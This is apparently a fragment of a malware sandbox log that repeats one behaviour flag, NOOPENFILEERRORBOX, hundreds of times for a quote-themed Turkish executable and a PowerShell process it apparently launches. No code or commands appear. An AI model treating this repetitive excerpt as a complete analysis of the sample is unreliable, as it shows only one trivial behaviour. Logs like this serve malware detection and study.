Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
